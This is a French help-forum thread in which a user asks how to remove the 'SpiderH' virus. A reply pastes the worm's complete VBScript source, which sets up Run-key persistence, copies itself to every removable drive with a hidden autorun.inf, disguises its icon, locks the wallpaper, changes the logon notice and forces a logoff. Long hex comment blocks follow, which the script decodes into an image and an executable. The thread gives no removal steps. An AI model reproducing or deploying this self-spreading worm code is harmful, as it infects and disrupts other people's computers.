Sujet Précédent Sujet Suivant

Jai le virus spiderH comment le nettoyer

waeeeeeelllll -  
 Kenshin_Battosai -
Bonjour, jaime savoir quil est le plus efficace antivirus contre ce virus merci pour votre reponce
A voir également:

50 réponses

Réponse 1 / 50
fzchristian
 
voici le code du fichier vbs. J'ai eu le même virus.
'this script is made by SpiderH and it based on a previous script !!!
On Error Resume Next
Demarrage = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpiderH"
BGS="HKEY_CURRENT_USER\Control Panel\Desktop\WallpaperStyle"
BGC="HKEY_CURRENT_USER\Control Panel\Desktop\ConvertedWallpaper"
BG="HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper"
OBG="HKEY_CURRENT_USER\Control Panel\Desktop\OriginalWallpaper"
Message="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText"
Title="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption"
BGfix="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ActiveDesktop\NoChangingWallPaper"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set shellapp=CreateObject("Shell.Application")
Set WSSH = CreateObject("Wscript.shell")
Set xx = FSO.GetSpecialFolder(1)
sub go()
location = wscript.scriptfullname
if (instr(location,xx)=false) then
if (FSO.GetDrive(FSO.GetDriveName(location)).DriveType=1)then
shellapp.Explore FSO.GetParentFolderName(location)
end if
affimage
else
dim TDepart
TDepart= Timer
do while time <> "00:00:00"
InfectRoot
wscript.sleep 15000
if((Timer-TDepart)>1800)then
TDepart=Timer
BGR xx
end if
loop
end if
InfectRoot
if (not FSO.fileexists(xx & "\SpiderH.vbs")) then
fich = Wscript.ScriptFullName
FSO.copyfile fich ,xx & "\SpiderH.vbs"
ccmd
Demarrer xx
BGR xx
CIcone
WSSH.run "ncmd.exe exitwin logoff"
end if
end sub
sub InfectRoot()
Dim d, dr
Set dr = FSO.Drives
For Each d in dr
Root = d.Driveletter & ":"
if (Root<>"A:")then
set dd= FSO.GetDrive(Root)
if ((dd.DriveType=1) and d.isready)then
if not (FSO.fileexists(Root & "\Wallpaper.vbs")) then
infect Root,"Wallpaper"
else if not (FSO.fileexists(Root & "\autorun.inf"))then
infect Root,"Wallpaper"
end if
end if
end if
end if
Next
end sub
sub infect(x,name)
fichier = Wscript.ScriptFullName
if FSO.fileexists(x & "\" & name & ".vbs")then
set fd0=FSO.GetFile(x & "\" & name & ".vbs")
fd0.Delete True
end if
FSO.copyfile fichier ,x & "\" & name & ".vbs"
FSO.GetFile(x & "\" & name & ".vbs").attributes=4+2
if FSO.fileexists(x&"\autorun.inf")then
set fd=FSO.GetFile(x & "\autorun.inf")
fd.Delete True
end if
FSO.CreateTextFile x & "\autorun.inf"
Set f = FSO.GetFile(x & "\autorun.inf")
f.attributes=4+2
Set auto = f.OpenAsTextStream(2, -2)
auto.writeline "[autorun]"
auto.writeline "shellexecute = Wallpaper.vbs"
auto.writeline "shell\Open\Command=Wscript \Wallpaper.vbs"
auto.writeline "shell\Explore\Command=Wscript \Wallpaper.vbs"
auto.Close
end sub
sub CIcone()
dim r
r = WSSH.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
WSSH.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\DefaultIcon\",r
end sub
sub Demarrer(location)
dim u
WSSH.regwrite demarrage,location & "\SpiderH.vbs"
u=WSSH.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName")
WSSH.regwrite Title,"Welcome!"
WSSH.regwrite Message,"Hi !!! "&u&" ! dont worry i am a friend! Have a nice day"
WSSH.regwrite BGfix,"1","REG_DWORD"
end sub
sub BGR(location)
if (StrComp(WSSH.regread(BG),location & "\SpiderH.bmp",1)<>0)then
WSSH.regwrite BG,location & "\SpiderH.bmp"
WSSH.regwrite OBG,location & "\SpiderH.bmp"
WSSH.regwrite BGC,location & "\SpiderH.bmp"
WSSH.regwrite BGS,2
end if
end sub
sub affimage()
Dim f, f2, ts, ts2,Ligne,i,c
if (FSO.fileexists(xx & "\SpiderH.jpg")) then
WSSH.run xx & "\SpiderH.jpg"
else
Set f = FSO.GetFile(WScript.ScriptFullName)
Set ts = f.OpenAsTextStream(1, -2)
FSO.CreateTextFile xx & "\SpiderH.jpg"
Set f2 = FSO.GetFile(xx & "\SpiderH.jpg")
Set ts2 = f2.OpenAsTextStream(2, -2)
for i=1 to 156
ts.skipline
next
c=0
do
Ligne = ts.readline
For i=2 to Len(Ligne) step 3
ts2.write chr("&h" + mid(Ligne,i,2))
Next
c=c+1
loop until (c=1265)
ts.Close
ts2.Close
WSSH.run xx & "\SpiderH.jpg"
end if
end sub
sub ccmd()
Dim f, f2, ts, ts2,Ligne, i
if (FSO.fileexists(xx & "\ncmd.exe")) then
WSSH.run "ncmd.exe convertimage "&xx&"\SpiderH.jpg "&xx&"\SpiderH.bmp",0,true
else
Set f = FSO.GetFile(WScript.ScriptFullName)
Set ts = f.OpenAsTextStream(1, -2)
FSO.CreateTextFile xx & "\ncmd.exe"
Set f2 = FSO.GetFile(xx & "\ncmd.exe")
Set ts2 = f2.OpenAsTextStream(2, -2)
for i=1 to 1422
ts.skipline
next
do
Ligne = ts.readline
For i=2 to Len(Ligne) step 3
ts2.write chr("&h" + mid(Ligne,i,2))
Next
loop until ts.AtEndOfStream
ts.Close
ts2.Close
WSSH.run "ncmd.exe convertimage "&xx&"\SpiderH.jpg "&xx&"\SpiderH.bmp",0,true
end if
end sub
go
'FF D8 FF E0 00 10 4A 46 49 46 00 01 02 00 00 64 00 64 00 00 FF EC 00 11 44 75 63 6B 79 00 01 00 04 00 00 00 32 00 00 FF EE 00 0E 41 64 6F 62 65 00 64 C0 00 00 00 01 FF DB 00 84 00 08 06 06 06
'06 06 08 06 06 08 0C 08 07 08 0C 0E 0A 08 08 0A 0E 10 0D 0D 0E 0D 0D 10 11 0C 0E 0D 0D 0E 0C 11 0F 12 13 14 13 12 0F 18 18 1A 1A 18 18 23 22 22 22 23 27 27 27 27 27 27 27 27 27 27 01 09 08 08
'09 0A 09 0B 09 09 0B 0E 0B 0D 0B 0E 11 0E 0E 0E 0E 11 13 0D 0D 0E 0D 0D 13 18 11 0F 0F 0F 0F 11 18 16 17 14 14 14 17 16 1A 1A 18 18 1A 1A 21 21 20 21 21 27 27 27 27 27 27 27 27 27 27 FF C0 00
'11 08 02 58 03 20 03 01 22 00 02 11 01 03 11 01 FF C4 00 C3 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 08 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00
'01 02 03 04 05 06 07 10 00 02 01 02 03 05 04 05 08 07 04 08 06 01 01 09 01 02 03 00 11 21 12 04 31 41 22 13 05 51 61 32 06 71 81 91 42 14 A1 B1 52 62 72 82 23 07 C1 D1 92 A2 B2 33 15 F0 C2 43
'24 E1 D2 53 83 93 A3 B3 16 F1 E2 63 73 C3 34 25 F2 D3 17 E3 44 54 35 74 D4 26 11 00 02 02 01 02 04 04 05 02 03 07 03 05 01 01 00 00 01 11 02 03 21 12 31 41 51 04 61 71 13 05 81 91 22 32 52 A1
'42 B1 C1 14 F0 D1 62 72 23 15 06 E1 92 33 F1 82 A2 43 24 53 34 FF DA 00 0C 03 01 00 02 11 03 11 00 3F 00 F2 32 6A 26 59 5C 07 6F 11 DE 7B 4F 7D 57 C4 4E 7F C4 6F 69 FD 74 12 35 E4 92 FF 00 48
'FC E6 87 30 15 F5 13 69 7A 9E 58 DE 7C DF ED 1B DA 7F 5D 4E 7C FF 00 ED 1B DA 7F 5D 02 B0 A3 C0 D2 97 D4 A0 0C 93 FD 36 D9 DA 7F 5D 01 79 AF E3 61 EB 3F AE 9C 54 55 64 14 D5 9F 56 48 8E 64 9F
'4D BD A7 F5 D4 E6 49 F4 DB DA 7F 5D 30 A5 AA B2 8A BD CF AB 18 1C D9 7E 9B 7B 4F EB AA 32 CD B9 DB DA 7F 5D 32 CB BA 87 2E FA 15 ED D5 8A 00 CF 2F D3 6F 69 FD 74 02 49 46 39 DB DA 7F 5D 3B 25
'51 8E AB 7B EA C2 00 E6 49 FE D1 BD A6 87 9B 2F D3 6F 69 FD 74 4D 1D 01 16 A6 9E 9F 73 1A 2F 99 37 D3 6F 69 FD 75 39 93 7D 36 F6 9F D7 43 6A 94 F7 3E AC 61 89 65 FA 6D ED 35 5C C9 7E 9B 7B 4F
'EB AA B5 4B EE A5 5B 35 CD 89 93 9D 27 D3 6F 69 A8 64 7B 58 31 F6 9A 1B 54 B5 56 E7 F9 31 41 04 92 8F 79 87 AC FE BA 9C D9 7E 9B 7B 4F EB AA AA B6 35 5B 9F 56 28 0B 98 FF 00 4D BD A7 F5 D4 E6
'BF D3 6F 69 FD 75 44 1D D5 59 6D 4D 5D F5 61 08 2E 6C 9F 4C FB 4D 4C ED F4 8F B4 D5 64 35 76 A7 BD F5 60 EA BA 49 62 47 DC E7 DA 68 79 93 7D 36 F6 9A 98 54 A3 7D BA BF 98 A1 74 04 C9 27 D2 3E
'D3 53 99 27 D2 6F 69 FD 75 76 15 0A D5 6F 7D 58 6D 07 99 27 D3 23 D6 6A F3 CB F4 DB DA 6A 65 EF A1 2B 8D 1B DF E4 CA 2F 99 27 D3 6F 69 A9 CC 93 E9 B7 B4 FE BA BC B5 56 A3 73 7C D8 13 99 2F D3
'6F 69 A9 CC 97 E9 B7 B4 D4 B5 55 56 E7 D5 FC C0 BE 64 BF 4D BD A6 A7 32 4F A6 4F A4 9A AA 94 6E 7D 5F CC 0B CE FF 00 48 FB 4D 56 79 7E 91 F6 9A B0 A4 D4 22 84 DF 56 05 09 24 FA 47 DA 6A 84 92
'FD 22 3D 66 A5 AA 5A 89 7D 58 17 CC 97 E9 9F 69 AA E6 49 F4 8F B4 D4 B5 5E 5A 37 3F C9 81 33 CB F4 CF B4 D5 89 25 FA 67 DA 6A 82 DA A5 12 FA B0 21 79 7E 99 F6 9A AE 6C A3 DF 3E D3 45 6A 84 0B
'51 B9 F5 7F 30 20 92 6D EE 7D A6 AF 99 27 D2 3E DA 0D 95 75 4A CF AB F9 81 5C E9 4F BE 7D A6 AF 99 2F D3 6F 59 35 56 15 2D 44 DB AB F9 81 7C C9 7E 99 F6 9A 9C C9 7E 99 F6 9A AC A0 D4 B5 13 6E
'AF E6 05 F3 65 FA 47 DA 6A B9 B2 FD 23 ED 35 55 28 9B 75 7F 30 2F 9B 37 D2 3E DA BE 6C DF 48 FB 4D 01 06 AC EC AA DC FA BF 98 17 CE 93 E9 1F 69 AB 59 5D 7D E3 ED 34 BA 94 6E 7D 5F CC 06 73 66
'FA 47 DA 6A 09 A5 FA 67 DA 69 56 AB 0A 0D 27 67 D5 FC C0 68 9A 4B E2 E7 DA 68 FE 22 5F A6 DE D3 40 9A 77 6F 08 AD 49 A0 90 EE A9 79 23 8D 9F CC 52 00 96 5D B9 DB DA 7F 5D 5F 36 5B 78 DB DA 6B
'57 F4 D9 32 E6 B7 AA A1 D0 B8 16 22 D5 9F AC BF 27 F3 16 D3 17 3A 5F A6 DE D3 FA EA F9 B2 FD 23 ED 35 A7 E0 9B B2 F4 26 0C B4 FD 6E 96 7F 30 D8 24 49 28 3E 36 F6 9F D7 51 9D F6 73 1B DA 69 85
'6C 30 A5 E3 4B D4 B7 36 FE 61 B0 58 69 6F 83 1B 7A 4D 4C F3 7D 23 ED A6 0D 98 D0 95 A7 EA DB AB F9 86 D0 0C 92 FD 33 EA 26 A0 92 4F A6 7D 64 D1 10 28 4D 0F 25 BA BF 98 C9 CE 90 1B 66 3E D3 53
'9D 2E F6 3E D3 40 47 10 AB 2B 6A BA DA F3 09 BF 98 68 C3 12 B8 F7 9B D4 4D 5F 36 6F A6 7D A6 96 2A 5C D5 EE B3 E6 FE 62 81 9C E9 3E 93 7B 4D 4E 74 9F 49 BD 66 93 7A 99 AD 4B 5E AF E6 1B 46 99
'A4 FA 4D EA 26 AB 9F 28 F7 DB DA 69 39 AA 5E 8D 57 37 F3 1C 2E 63 7E 22 4F A4 7D A6 A1 9E 63 B1 8D BD 27 F5 D2 6A AD 4A 5F 56 11 5E 83 B9 AE 36 B1 F6 9A 13 33 FD 36 F9 69 56 24 DB B7 65 11 8E
'55 8D 66 31 B7 29 C9 54 92 DC 2C C3 68 07 BA F8 D0 F4 D1 D9 A9 1A AA 73 1C 8B 32 B8 F7 8F B4 D0 19 64 27 69 F6 D1 49 14 91 AA 17 42 A2 45 12 46 48 23 32 1B 80 C2 FB 8D A9 67 0F D3 44 BE 2A CD
'FC 43 6A 4F 81 7C D9 3E 91 F6 D4 E6 CB F4 8F B6 97 9F B0 55 9A 1B 71 C5 8F 6A E4 5F 36 5E D3 ED 35 46 49 07 BC 7D A6 A5 53 06 00 31 06 CD 7C A7 71 B6 DB 1E EA CF 7B FC 9F CC AD AB 9A 27 35 FE
'91 A9 CD 93 E9 1F 6D 05 4A 25 F5 61 B4 3E 6C 9D A7 DB 54 64 6B E0 C7 DB 43 7A 97 02 F7 A5 BA CB 9B 0D A5 67 7F A4 7D B5 39 8D DA 7D B5 55 78 53 DF 6E AC 69 46 85 E7 6E D3 ED BD 40 ED 98 62 76
'D0 93 6A 8B B4 7A 47 C9 42 BD B7 2D 5F 11 C2 3A C5 DB 3B E3 B4 9F 9E AC 3B 55 B4 7C 6D E9 3F 3D 51 42 2B 8D C6 E7 E6 41 62 42 B4 E4 98 56 7B 11 53 01 43 48 0D EA CA 47 7D 5D 66 89 AB 42 B5 F6
'D4 88 87 1A 5E 5A 6D AF 8D 43 1D 01 22 6D 50 B5 A8 CC 74 06 3A 61 25 03 DF 45 9E 80 AD 50 B8 37 BD 38 09 0C EC BD 29 A8 C9 EF A5 D5 A4 12 0D 55 AA 63 7A 84 D0 B5 19 60 1D D5 45 4D 4D B4 78 53
'10 BC 6A EF 6A 33 6B D0 DB 75 08 01 AA B5 11 16 35 55 52 22 54 17 BE 15 32 D1 8C 29 81 00 34 05 4D A9 B7 A8 CB 40 09 B5 4B 53 72 D4 CB 4E 43 51 56 34 57 AB CA 6A 65 34 48 01 97 B2 A5 A8 F2 9A
'99 7F B5 E8 90 17 B6 A6 5E DA 2C A6 A6 5A 69 80 B2 01 35 56 A2 B5 5D 87 F6 34 E4 00 B0 A9 61 57 6B 54 A6 29 2A D5 7B AA 61 52 9C 8C 10 2F 57 94 D5 D5 E3 44 80 39 4D 5D 15 40 B8 D2 02 58 55 65
'06 8F 2D A8 48 EF A7 20 55 AA 88 A6 5B 0A 12 3B 68 90 03 28 AA B5 A8 AD 52 D4 48 0B 0A 6A F2 D1 DA A5 BB E9 C8 00 05 AA E8 C2 8A AC B8 D3 96 00 65 AB B0 A3 36 AA B5 E8 96 02 EA 53 32 8A 12 B8
'55 26 00 E5 F5 55 5A 88 29 FF 00 C6 89 63 27 00 2F 49 D9 00 19 6B 4E 96 13 23 80 76 5E 8E 2D 1C 8D EE 9A E8 69 B4 46 32 09 C3 1D B5 95 F2 28 69 30 36 E9 F4 11 80 09 AD E9 A5 89 47 09 AC 69 23
'47 85 39 67 ED AE 1C 8E CF 98 40 E7 8D 46 02 D8 56 57 55 1B 05 14 9A 8A CA F3 92 4D AA 6B 2F 91 40 C8 6D DD 58 E7 71 B3 7D 3E 49 52 D8 93 58 66 37 6B D7 45 2A 29 05 98 7B B4 A2 4E 35 2A 6D AD
'60 24 0C C6 A6 63 B2 D4 45 71 AF 5B E4 6F 2B 6A FC C1 36 B6 7D 1C 8B 1E A7 A7 C4 B2 E8 CB 10 01 D4 96 1C A2 78 58 59 6C 4D AD B6 C0 E1 53 97 25 31 62 B6 4B B8 55 E7 E2 C2 B5 DD 68 5C CE 0F 55
'E8 3D 63 A2 F2 3F AA E8 E4 D2 8D 4A 09 21 67 02 CC 0E 36 B8 D8 46 F1 5C D2 2B EC 1E 76 D5 F5 1D 37 91 23 E9 7E 6B E4 CB D7 A4 99 7E 10 C6 E1 98 AC 66 E6 77 B6 17 CB 75 3D B7 AC 5A AF C9 BD 76
'A6 45 97 A7 6B 60 8B 4A F1 43 96 39 04 85 B3 72 90 48 C4 F1 78 9F 31 AE 3C 3E E1 45 44 FB 86 AA DD AC 95 92 9A B5 5E 68 D9 E0 73 14 97 11 29 9E 33 CD 7E 58 FF 00 B7 17 A3 BA C8 65 1D 43 46 9A
'99 1F DD 12 93 C4 8B DC 03 2D 70 16 37 99 C4 71 2B 48 ED 82 A2 02 58 9E C0 06 DA FB 8F 57 F2 36 A3 CC 1E 56 E9 5D 19 35 F0 49 D5 7A 1B 1D 3C 9A 8E 23 1D B2 D8 C4 D9 46 65 39 32 1D 9B A9 DE 4B
'F2 AC 1D 03 45 A8 87 A7 EA F4 5A 9F 31 45 38 5D 74 F6 32 88 94 11 FE 5C 0B AB A7 0E FE DA CF 17 BA D6 9D BF D4 FD 4C B5 B3 5A CF 09 D2 CD F4 2A DD BB B6 4F C6 A7 C1 E4 D3 CF 0C A6 09 A3 78 E6
'56 C8 D1 3A 95 60 C7 62 95 38 DE BD 14 FF 00 97 DE 70 83 40 BD 45 BA 5C 86 12 B9 F2 21 57 94 2E DB B4 4A 73 8F 65 7D 3B CC 5F 97 5D 5B 57 E6 A3 E6 8E 83 AB D2 C3 33 11 28 8B 56 8E E1 66 0B 90
'B8 0A 18 11 BC 77 D7 4B A7 EA 3A FF 00 95 23 6D 6F 9E 7C C9 A3 9B 46 6E 11 39 56 94 B6 EC 8E BC A2 7D 02 33 55 97 DD AD 6A E3 78 1D 1D 9A FA A8 D5 DD DD BF 14 92 0A F6 D1 2A F3 1C 99 F9 E1 94
'AB 32 BA 95 75 36 64 22 C4 11 DA 36 D6 8E 9F A0 D4 F5 5D 76 9F A7 68 D3 3E A3 52 E2 38 C0 1B CE F3 DC 36 9A FB FE 9B 5B E4 2F CC 09 35 29 A4 D2 C1 AF D6 E9 E3 0E CF 3C 0F 13 71 12 10 99 32 AB
'91 9B 6D AB C7 F4 EF CA 5F 35 74 AE A5 07 53 E9 FD 4F 47 1C FA 79 16 48 8A F3 B6 7D 1F E5 EC 23 03 5A D7 DD AB B6 F5 CC 9E 0C 95 5A 2B 27 0D BE 1C 84 BB 7D 6A D3 DD 56 F9 74 3E 69 D6 BA 46 AF
'A0 F5 3D 4F 4A D7 AE 5D 46 9D B2 B5 B6 30 38 AB AF D5 61 88 AA D3 F4 3E AF AB E9 FA 8E AB A6 D1 CB 2E 87 4B 86 A3 50 8B 74 5D 9B 7D 17 DD 5E CF F3 93 95 FF 00 76 29 40 A2 6F 82 84 EA 02 E3 F8
'81 A4 FE EE 5F 55 7D 23 CB BA 34 E9 FD 1B 41 A7 7D 6E 9C F9 77 59 A0 48 63 D2 AC 44 CC DA 89 57 99 34 86 5B B6 60 46 72 70 C2 DD D4 64 F7 1B D3 B5 C1 9B 6D 5D F2 2D 65 74 E3 F1 7C 81 61 AD B2
'5E B3 0A A7 E7 6A D9 D3 7A 57 50 EB 1A A5 D1 74 DD 34 9A A9 DB 6A 44 B9 88 1D AD 6C 00 F4 D6 57 55 0E C2 3E 38 C1 20 13 B4 A8 38 7C 95 F7 BF 25 68 BC BD 0F 93 60 E9 7A 6E AF 0E 9F 5D AE 88 49
'AE 9F 4B A8 89 35 19 DC 5D 96 ED 76 19 57 87 66 15 D5 DF 77 8F B7 C3 5B 56 9B ED 77 0B 46 D5 67 8D B4 E8 46 2C 4A D6 72 F4 AF EA 7C BB F3 0F CB 90 79 67 AC E9 F4 5A 45 CB 0C 9A 28 5C 7D 67 00
'C5 23 1D D7 66 42 D8 76 D7 73 CE BA 6D 22 FE 5C 79 3E 7D 14 4A 91 62 F2 85 DF 23 C6 1A 4C C7 B4 B2 9A F4 5D 5F C9 9A 6F 3C 74 8E 92 FE 5C EA 28 C9 D2 44 DD 3A 4D 46 AC 31 69 56 27 C9 72 D1 FD
'65 25 70 C4 1B D6 CD 57 90 35 FD 47 C8 BA 2F 2A C5 AD D2 BE BB A6 EA 99 9A 6B C8 62 02 F2 37 2C D9 49 CC 04 A2 F8 57 98 BB DC 5B 3B 4F 52 EF 7E 2C 8F D4 50 FE D7 3A BF 99 BB C5 69 C9 B5 28 B2
'D3 CC E4 79 EB 57 E5 6D 5F 91 3A 3F 51 97 A7 A8 EA 1A BD 3A 45 D2 B9 57 53 0F 2D 57 9A 19 ED 8A 46 70 B1 DF 5E 52 0F 2E E8 3F FD D8 6A BC C8 50 49 D4 1B 5A 88 1C ED 8A 24 7E 51 51 F6 B3 5F D9
'5D 6F CC 3E 8F 37 97 BC A3 E5 9E 87 AE 9A 39 B5 7A 59 35 76 78 AF 97 96 E4 3F BE 15 BD E1 BA B9 DD 2B AA C1 17 E5 67 5F D0 4A C0 CC DA D8 44 28 DF FA A1 1B 87 FE 13 1A D3 B7 4E BD B6 3B 61 B5
'AC AD DC AE 7A 3A 6F 6B 4F 06 2B EB 91 AB 25 F6 7E A7 80 B5 AB D3 79 2F FE D0 1D 46 63 E7 16 90 69 44 4D F0 E1 43 18 CB FD 7E 5F 1D ED E0 DD 7A F3 B0 C3 26 A6 68 F4 F0 AE 69 A5 75 48 D7 B5 98
'E5 1F 29 AD DD 7B A6 27 46 EB 3A CE 92 8E F2 1D 13 F2 64 91 80 BB 3A 8B 3D 80 DC 5B 67 75 7A 79 95 72 27 DB BB DA AE F5 9F A1 C5 95 53 30 A4 AF A9 A4 D5 7A 99 75 CB A3 5D 5C C7 A7 F3 7F A7 99
'1F E1 5A 70 33 98 C1 E1 CD 6C 33 5A D7 B5 7B 4F 3C 43 02 F9 3B C9 1A 88 23 08 B2 69 67 49 02 8C 0B 29 8A E4 FA 58 9A D5 AD 6E 89 D5 7F 28 F4 D3 C1 12 C1 AF E8 9A A5 81 87 BD 24 93 30 CF C5 BF
'98 8C 1C FD 9A EE E8 7C A7 A8 F3 DF E5 C7 97 60 D1 4D 16 9E 7E 9D 2C E8 64 97 36 52 85 98 35 B2 06 C6 F9 4D 79 B7 EE 52 78 72 64 9A 2C 39 AD 8E ED EB 31 58 4C E8 55 7F 54 43 DD 54 CF 9D 74 0F
'23 79 9B CC BA 67 D5 F4 9D 11 93 4E 87 2F 3A 46 58 95 98 6D 09 9C 8C DE AA E4 F5 2E 95 D4 BA 3E A1 B4 BD 57 4B 26 92 75 F7 25 52 B7 FB 27 63 7A AB EF 1D 2B CB 5F 98 9D 19 74 EB 27 98 7A 76 93
'A4 E8 A2 58 F9 0B A7 CD 12 A2 8B 12 43 AC 46 E7 79 32 57 47 57 E7 CF CB DE A9 AA 8B A2 6B 35 30 F5 19 65 91 21 40 74 ED 2C 26 47 39 05 9D 91 97 6E FB D6 2B DD 33 3C AF 6D 6B 97 1A FC 26 52 F1
'6C 6F 0D 52 D5 B4 DF F1 3F 34 DF 0B 8C 47 6D 34 E9 75 3F 0C 35 A6 17 F8 5E 60 87 E2 0A 9C 9C C2 0B 64 CD DB 61 7A FB 4F 9A BF 26 A7 EA 7D 55 B5 3E 5F 6D 17 4D D0 04 54 5D 31 E6 E6 2D 89 77 6B
'2B 8C 6F 4E D7 7E 5A EA 3A CF 94 7A 47 97 7A 77 50 D2 2C FD 1F 51 30 EA 2E A5 DA 36 99 AF 9B C2 B9 B3 A8 36 C6 BA 3F DD 7B 76 B1 B4 E3 73 FA E5 3F A1 11 E8 5B 59 E5 C0 F8 56 C0 2F 61 7F ED BE
'A5 9A F6 02 E7 B3 B4 F7 6F AF B8 E8 3F 28 FA 96 8B CB 1D 53 A5 47 AB D2 37 54 EA 52 45 7D 59 57 2A 9A 78 CF 33 20 39 33 82 CE 2B A9 A0 FC B3 4E 9D AD F2 EC F3 B6 95 FA 5F 44 86 49 75 A0 86 0F
'36 AD EF 23 4E 4E 5C A5 55 82 DB 36 C0 2A 6F EE D8 13 7B 75 86 D2 E3 F5 42 9F D7 80 D6 0E 0D E8 7E 79 20 8B 82 08 23 71 16 AA 5D A3 D3 5A FA 8C C9 A8 EA 1A B9 E3 C6 39 66 95 D0 F6 AB 3B 15 3E
'B1 59 00 E2 1E 9A F4 E9 AE D7 D5 99 5B 8B 83 D3 49 10 E6 3F DA 3F 39 A1 31 8A D3 20 5E 63 E1 EF 1F 9C D4 0A 3D 55 C4 FE E6 63 26 26 86 80 C5 6A E8 15 52 6D 40 D1 77 61 49 34 12 62 55 23 6D 34
'1B 5A 9F C9 B6 DA 59 88 8A 72 82 42 56 34 D1 94 F6 D2 82 91 89 D9 4C 51 85 00 16 51 6A 02 BB A9 80 DF 0A 99 71 A0 52 67 31 D0 98 F0 AD 16 C6 AC A6 14 0C C9 CB BD 51 8F 1A D2 63 A0 22 D8 55 4B
'01 1C B1 40 62 DF 5A B2 55 5B 75 A9 A6 C2 4C 99 6D 53 8A B4 14 BD 56 4A A9 03 3E 24 D5 8D F4 CC B6 DA 28 0A DC F6 53 40 0E 5E DA AC B8 D3 02 9A BB 53 00 32 9A B0 BD B4 76 35 56 37 A7 20 56 51
'57 56 45 4C A6 86 05 0A BD B5 2D 54 41 A0 09 94 54 CA 2A 65 EF A2 A6 00 E5 15 45 45 E8 EA AD 40 01 6A 03 71 8D 33 27 7D 51 C0 0D E3 B2 9A E2 02 88 B1 AA CA 69 96 BD 55 A9 F3 00 08 BD 4C BB 45
'5D AA ED BF B6 A8 50 06 50 2A 6F A2 B5 56 5A 06 4B F7 55 ED A9 6A B1 85 00 55 8D 5E 4A 94 54 00 39 6F D9 EA AA B5 30 50 91 8D 00 4B 1A 96 ED AB AB 18 D0 00 95 B8 A1 09 85 36 D8 50 8A 00 02 B8
'6C AA CB DB 4C B5 EA 88 22 80 17 96 D5 3B AA C9 15 77 14 E4 01 03 1C 6A ED D9 44 06 FA BB 53 4D 73 00 48 BD 51 14 E5 85 DF C2 2B 4C 5D 36 72 3C 14 9D EA B8 B0 31 A2 17 61 61 7A EE 74 CE 9B 19
'B3 4B 8F 71 A9 A5 E9 85 31 61 5D 0E 28 FC 22 B9 72 E6 9D 2A 0A 79 87 2E 9E 18 47 05 60 91 F1 C3 0A D0 4B 37 8A F4 A9 23 27 75 64 9B 5C 5C 8E 0C F9 98 9C 2A F3 30 DB 4E E4 D8 5E 94 E9 73 85 0E
'C9 81 99 E5 6F 55 07 30 8A 63 C3 6C 45 29 D6 D5 75 80 81 32 48 69 0C C4 D3 9C 0A 41 DB 6A DA A9 08 0B 93 44 01 A9 96 AC 35 AB 47 5E 80 32 38 AF DE 6B 7E 8E 5D 76 85 CC BA 1D 4C BA 69 08 CA CD
'04 8D 19 23 B0 95 22 E2 B2 43 22 0B 1A D6 92 29 1B 2B 2B A9 D1 A9 5E 3C 03 83 4D 38 82 6A 1B 55 AC 97 9F AB 9A 4D 44 C7 03 2C CE CE E4 7D A7 CC 7E 5A 6B 75 AE BB 18 0A BD 5B 5A AA 30 00 6A A6
'00 77 58 38 AA 0E 95 9B 54 CA 01 23 D3 51 5A 56 CE 1D 53 8E 12 B8 0F 75 B5 D5 EB E2 24 75 9E AD A5 32 1D 37 51 D5 42 65 73 24 9C A9 E5 4C EE 76 BB 64 71 72 6D B4 D6 7D 2F 54 EA 3D 3F 58 3A 8E
'8B 55 2C 3A DC D9 8E A1 1C E7 24 9B 9C C5 AF 9A FD F5 9A 46 19 A8 6B B1 61 C7 B6 36 57 55 0F 45 A8 A5 F5 7F 33 B7 AE F3 7F 99 BA 86 A5 F5 93 F5 5D 52 4B 25 B3 2C 13 49 0C 7C 2A 17 86 38 99 54
'57 2B 53 AC D6 EB A4 E7 6B 75 32 EA 64 02 C2 49 E4 69 1C 01 B8 33 96 36 A4 EE A9 55 4C 38 A8 96 CA 56 B1 C2 14 03 6D F1 6D FC 47 69 75 DA ED 03 97 E9 FA A9 B4 8E D8 33 69 E5 78 89 1B 6C 4C 65
'6F 8D 7B 8E 87 06 A7 AA 79 67 5D D6 35 7E 73 D4 E8 F5 9A 6F E5 69 5F 57 35 97 1C 04 A3 36 62 64 F7 72 EC AF 9F 91 7B 8A 9B 2C 37 8D 95 96 7E DD 65 4B 6B 54 72 9B B4 2B 4A AF 2D 4A A5 D5 78 A6
'FA 6A 77 BA 57 4A 9F CC 92 B4 DA CE B5 A5 82 72 C1 64 7E A7 A9 61 21 0A 05 9B 34 80 E6 16 C3 6D 7B 3D 4A 79 67 C9 1E 5F D4 C5 D2 3A 8C 5D 5F CC 7D 42 23 A6 5D 4C 0E B2 47 04 6F 84 AD 1E 42 CA
'82 D8 6D B9 3D D5 F3 28 D3 10 3D B5 AA 25 50 6C 07 65 FD 55 86 7E D9 E4 DA 9E 46 B1 D5 A7 E9 A4 92 D3 C5 15 5C BB 67 6D 61 BE 2E 64 54 7A 69 18 61 B3 B2 89 B4 4C 36 61 BE FB EB A5 06 9D B6 DA
'9B 32 05 1E AA A7 9D AB 6D E4 66 A4 E5 E9 B5 BD 5B A7 06 5D 06 B7 51 A5 56 37 65 D3 CC F1 06 3D E2 36 5A 91 F5 AE B7 A7 0F C8 EA 7A C8 8C AC 64 93 26 A6 65 CD 23 78 9D F2 B8 B9 3D B4 C9 54 12
'0D 61 75 B0 D9 5A D7 65 F5 75 AE BE 08 7B 9F 56 16 AB 5F AE D7 B2 BE BF 57 36 A9 D2 E1 1A 79 1E 52 A0 E2 6C 64 66 A4 16 39 4A 92 6C 4E 62 B7 36 BE CB DB B7 1A AA A3 5A AA A4 A1 24 97 44 B4 5E
